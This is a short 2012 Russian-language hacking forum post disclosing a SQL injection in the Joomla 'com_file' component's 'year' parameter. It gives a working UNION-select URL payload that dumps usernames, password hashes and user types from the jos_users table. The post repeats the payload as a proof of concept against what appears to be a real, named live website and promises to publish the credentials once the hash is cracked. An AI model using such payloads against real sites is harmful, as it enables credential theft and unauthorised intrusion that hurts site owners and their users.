22.03.2012, 08:48
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
Провел на форуме:
102354
Репутация:
267
|
|
Joomla "com_file" component SQL Injection
Уязвим параметр year, что позволяет провести SQL-injection.
Эксплyатация:
Код:
http://site.ltd/index.php?option=com_file&action=list_files&year=-2011'+union(select+1,concat_ws(0x3a,username,password,usertype),3,4,5,6+from+jos_users+limit+0,1)--+g
PoC:
Код:
http://www.crandalltexas.com/?option=com_file&action=list_files&year=-2011'+union(select+1,concat_ws(0x3a,username,password,usertype),3,4,5,6+from+jos_users+limit+0,1)--+g
P.S. Скоро будут коды, как хэш сбрутят.
|
|
|